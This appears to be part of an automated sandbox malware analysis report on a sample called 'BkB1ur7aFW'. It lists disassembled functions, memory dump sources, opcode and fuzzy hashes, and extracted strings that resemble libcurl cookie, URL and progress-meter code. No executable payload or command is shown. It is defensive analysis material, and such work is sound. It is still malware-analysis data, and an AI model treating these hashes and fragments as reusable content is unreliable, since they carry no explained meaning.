                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7be7ba21487e0fd27d26e401db0a11579cbf8bb53efe3378d8228092910c99dc
                                                              • Instruction ID: df2d35ec4257825a1f288274785b8fa256e3aee20999cc9547e33cd78cc13a27
                                                              • Opcode Fuzzy Hash: 7be7ba21487e0fd27d26e401db0a11579cbf8bb53efe3378d8228092910c99dc
                                                              • Instruction Fuzzy Hash: AE418BEBA2D125BC7509C0816F54AFB276EE1DFB30B32C83AF806D9185E3559ECA5031
                                                              Function 07110B3C Relevance: .2, Instructions: 244COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f3a9c669a8080d8f9dd5fff4d2a0295e19fd8e7afba92581de4897d88459e92e
                                                              • Instruction ID: 6efcb46f491bfb41cd84a4917643c15781997c1aa5243bc2333731c14221c7c3
                                                              • Opcode Fuzzy Hash: f3a9c669a8080d8f9dd5fff4d2a0295e19fd8e7afba92581de4897d88459e92e
                                                              • Instruction Fuzzy Hash: 8C4198EBA2D125BD7509C0822B10AFB672EE1DF730B32C43AF807D9185E3948ECA4031
                                                              Function 07110B84 Relevance: .2, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f31bb7a092571911d5e5cd4cef12e372ef262d7f1db4e31a7086c011449e340
                                                              • Instruction ID: 39fc9323a0ee9fc274070b7d037f7d651968547eedb7acf3d35aec2e06846eef
                                                              • Opcode Fuzzy Hash: 4f31bb7a092571911d5e5cd4cef12e372ef262d7f1db4e31a7086c011449e340
                                                              • Instruction Fuzzy Hash: DE417AEBA2D125BD7509C0822F54EFB676DE1DB730B32C436F806D9185E3959ECA5031
                                                              Function 07110B77 Relevance: .2, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 198d4eab96ef53ed5f28702da97183fc50321111107f802e2e2a2f150f044c62
                                                              • Instruction ID: 9967d5aa0d7091a28610605fd5b097f6629d8706f69ddd3966e67cc931004ad6
                                                              • Opcode Fuzzy Hash: 198d4eab96ef53ed5f28702da97183fc50321111107f802e2e2a2f150f044c62
                                                              • Instruction Fuzzy Hash: E4417AEBA2D125BD7509C0826F14AFB676DE1DB730B32C43AF807D9185E3959ECA5031
                                                              Function 07110BB8 Relevance: .2, Instructions: 207COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff84ae598f775c2070adef685b8e12f0dd92036764fd01041cb746a375b83c54
                                                              • Instruction ID: 02b64e06acefeed82504d500e2c7c473454d758d7daee253a9f913902d7b56da
                                                              • Opcode Fuzzy Hash: ff84ae598f775c2070adef685b8e12f0dd92036764fd01041cb746a375b83c54
                                                              • Instruction Fuzzy Hash: AB4179EBA2D125BD7609C4822B10AFB276DD1DB730B32C83AF806D9186E3559ECA5031
                                                              Function 07110BDC Relevance: .2, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc6226a9842338b41dcd2efa2a444980babe4a13925b5e5036a6c554b9180ed0
                                                              • Instruction ID: f2ada332755d9d678a8289a56f2cd4301500bca04eb753c5fccb670bf36b209a
                                                              • Opcode Fuzzy Hash: cc6226a9842338b41dcd2efa2a444980babe4a13925b5e5036a6c554b9180ed0
                                                              • Instruction Fuzzy Hash: 943198EAA2D115BD7609C4826F10AFB276EE1DB730B32C43AF807D9185E3599ECA4131
                                                              Function 07110BFC Relevance: .2, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49bc6135973380f30df768fa3089bea2543df76f0d9431a8b40c98196cf3fccc
                                                              • Instruction ID: 3a1090fbc6ed7ac8dbca2f6c74c385e1dc5bb0654e12094cd2a52a77f3b53b3a
                                                              • Opcode Fuzzy Hash: 49bc6135973380f30df768fa3089bea2543df76f0d9431a8b40c98196cf3fccc
                                                              • Instruction Fuzzy Hash: 7B3188EBA2D115BC7609C4826F10AFB276DD1DB730B32C43AF807D9185E3549ECA4031
                                                              Function 07110C0A Relevance: .2, Instructions: 178COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ead440227af9c92d970319b3b63f3a8dea671406efeea2492fe69f33a09329fa
                                                              • Instruction ID: a9ca5be972e0406f919d7933b91404599502d0adba1c05a75e74987aa1f4f8ee
                                                              • Opcode Fuzzy Hash: ead440227af9c92d970319b3b63f3a8dea671406efeea2492fe69f33a09329fa
                                                              • Instruction Fuzzy Hash: FA318BEBA2D115BC7509C4426B50AFB276DD1DF730B32C836F807E9185E3559ECA5031
                                                              Function 07110C3A Relevance: .2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1461732c64eba89b9d92e2d9e985086e3f522ce0bf2ca5dc7cccaa3d17277e82
                                                              • Instruction ID: 84617b2e597f913a8df9cff457ea0d02418371186a3d64e26d631caaf1906bcc
                                                              • Opcode Fuzzy Hash: 1461732c64eba89b9d92e2d9e985086e3f522ce0bf2ca5dc7cccaa3d17277e82
                                                              • Instruction Fuzzy Hash: 473112EAA1D114BDBA0584416F54AFB2B3DD6DF730B32C43AF803EE186E3559E894131
                                                              Function 07110C20 Relevance: .2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f26e34c7c013c7437562757dd5508badfa1138199694b934097126463aeffde3
                                                              • Instruction ID: b962f31ea6668649930bcb7cde3ff2d684e7300502036c01b5e996b299b976c9
                                                              • Opcode Fuzzy Hash: f26e34c7c013c7437562757dd5508badfa1138199694b934097126463aeffde3
                                                              • Instruction Fuzzy Hash: CF319CEBA2D115BD7609C4426B50AFB276DE5DF730B32C43AF807E9185E3559EC94031
                                                              Function 07110C70 Relevance: .2, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f34cfdc96d9c3246245d8c7c1971a0a385312f496d43db2d9125096925971b4
                                                              • Instruction ID: 179a3da70a5f58573da91f9da0a6413279291286fa09333bf4df7cb51e45e223
                                                              • Opcode Fuzzy Hash: 0f34cfdc96d9c3246245d8c7c1971a0a385312f496d43db2d9125096925971b4
                                                              • Instruction Fuzzy Hash: 5731DCEAA2D015BDBA05C4426B54AFB2B2DE1DF330B32C436F406EE185E354DECA4031
                                                              Function 07110C90 Relevance: .1, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a858c7809368acb9fd6d31b2e1ffd861dff2a1c9a663ba3432588bc477e1f8a
                                                              • Instruction ID: d828bf8a1a2adc76549016e435d196fe64c543219dbff413bea00c70d2a20719
                                                              • Opcode Fuzzy Hash: 1a858c7809368acb9fd6d31b2e1ffd861dff2a1c9a663ba3432588bc477e1f8a
                                                              • Instruction Fuzzy Hash: 1521EEEAA1D015BD7A05D4826B54AFB2A2DD1DF730B32C436F407E9185E355DEC60071
                                                              Function 07110CD8 Relevance: .1, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 785e5f5c82baf6861780e23427b97c14ba63f2a2a75f0cf3b11b48457b31209a
                                                              • Instruction ID: c5d111926493d8a88103045733a3bf5f8618c241a16df8e0737171066a1b3105
                                                              • Opcode Fuzzy Hash: 785e5f5c82baf6861780e23427b97c14ba63f2a2a75f0cf3b11b48457b31209a
                                                              • Instruction Fuzzy Hash: 131135E6E2D015ADAA0AC4426B905FA2B69D6DF330B33C536E407AE180D324DAC24171
                                                              Function 07110CF9 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ceffb51ea7263366b5992f05d2a8a4481bca4a7da48724660a63751d79cb309d
                                                              • Instruction ID: 99cf5d1642587a4d7127a8240a4e5a70b29af17571a5a31b755eb01326592cae
                                                              • Opcode Fuzzy Hash: ceffb51ea7263366b5992f05d2a8a4481bca4a7da48724660a63751d79cb309d
                                                              • Instruction Fuzzy Hash: 351138D6E2D019AD5A0984515B509FB2A3996DF330F33C535F407AE1C09314DAC14131
                                                              Function 07110D0E Relevance: .1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 95159255dca531e23fcd38106611d656aea867d8e0b6caa0b7ea159769153027
                                                              • Instruction ID: 5566d0079da8cd4a6a25997ecacc62da4e89f0f7ce0c7ffb6ec70473c0029dc8
                                                              • Opcode Fuzzy Hash: 95159255dca531e23fcd38106611d656aea867d8e0b6caa0b7ea159769153027
                                                              • Instruction Fuzzy Hash: BA1127E5D2D019EE9B09D4524A906FB2A7996DF330F33C535F407AE1C1E325EAC14131
                                                              Function 07110D43 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d0628b24ff261f137cfbf211e97eb1618fdde586a036543dc82b248d58aeab0
                                                              • Instruction ID: ae4e586cfd4b8bd6cead1f63a62fa9bc60caa3868b3578acac65dd431246b1f9
                                                              • Opcode Fuzzy Hash: 6d0628b24ff261f137cfbf211e97eb1618fdde586a036543dc82b248d58aeab0
                                                              • Instruction Fuzzy Hash: 231136D6D2E119ACAA0A91521B54AFB2E78D5DF330B33C93AF043BE0D1D315EAD54171
                                                              Function 07110D37 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38a2c2a226c09aa24b2102c5f58cee439abfdf4f254b2886fe533a1995c5de12
                                                              • Instruction ID: ffd8bddb9c7a76b4c6409f6ebff33fc2de70b329e230a5b7dca9d0a761dca395
                                                              • Opcode Fuzzy Hash: 38a2c2a226c09aa24b2102c5f58cee439abfdf4f254b2886fe533a1995c5de12
                                                              • Instruction Fuzzy Hash: 430126E6D2D019BD5A0A90525B546FB2A79D6DF730F33C536F407BD1C09315DAC10071

                                                              Non-executed Functions

                                                              Function 00431BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                              • API String ID: 0-1371176463
                                                              • Opcode ID: 7aee3cfda2c54c44fc5983a8d87937cfeaf5bf00a5ac56b152a26020297616b5
                                                              • Instruction ID: bbbc12570253855bfef0b9bffb48beaee8f04bf1e8fd16e69292b0c64dd9636e
                                                              • Opcode Fuzzy Hash: 7aee3cfda2c54c44fc5983a8d87937cfeaf5bf00a5ac56b152a26020297616b5
                                                              • Instruction Fuzzy Hash: 3EB25B71A08301ABE7209B24DD46B2777D0AF8C304F08953EF98D97392E7B9EC15975A
                                                              Function 00404940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                              • API String ID: 0-122532811
                                                              • Opcode ID: bd5a6b32b49ceb2c43a3a9a09f2d6b745d321c3c5290b056e08d73be052fd864
                                                              • Instruction ID: cf8f98eb7b95189c20ac322b2c3fa5e279316eca1e7821f2faf106e44a8bd579
                                                              • Opcode Fuzzy Hash: bd5a6b32b49ceb2c43a3a9a09f2d6b745d321c3c5290b056e08d73be052fd864
                                                              • Instruction Fuzzy Hash: 0242D8B1B08700AFD718DE28CC41B6BB6EAEFC4704F04892DF55D972D1E779A9148B92
                                                              Function 00403ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                              • API String ID: 0-3977460686
                                                              • Opcode ID: 573a30f838abdde8d6650f10e2eb78db785a274f57399340982e707bf9ee42b8
                                                              • Instruction ID: aaad0f3b288612ddd7501363afb818f97ee73f51229a321c6368e2cd1a72cb10
                                                              • Opcode Fuzzy Hash: 573a30f838abdde8d6650f10e2eb78db785a274f57399340982e707bf9ee42b8
                                                              • Instruction Fuzzy Hash: B33219F2A083018BC724AF289C4131B77D55BD1324F154B3FEBA9AB3D1E63CD941868A
                                                              Function 00414F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                              • API String ID: 0-1914377741
                                                              • Opcode ID: 542b347ea4ee8784e75d0e6ced4bafdc7d24b9cf67a3be16363a76c01128a7db
                                                              • Instruction ID: 24c799788de23ac396b5a2ed5708667851b55d7f31b1ad45daec2845eb4d8012
                                                              • Opcode Fuzzy Hash: 542b347ea4ee8784e75d0e6ced4bafdc7d24b9cf67a3be16363a76c01128a7db
                                                              • Instruction Fuzzy Hash: AC721871A08B41DAE7254A28C5467E777D29FD1344F08861EED884B392E7BED8C4878A
                                                              Function 004A9880 Relevance: 10.2, Strings: 8, Instructions: 226COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                                              • API String ID: 0-2058201250
                                                              • Opcode ID: 8a46829965dd1976775f3f2ddf64c0689bed4e209a72aaf5486ca474400ae754
                                                              • Instruction ID: 7e5a48af73f0ea1ae2779da25cb633189369919ee8fd6075a709f16ecd8b0592
                                                              • Opcode Fuzzy Hash: 8a46829965dd1976775f3f2ddf64c0689bed4e209a72aaf5486ca474400ae754
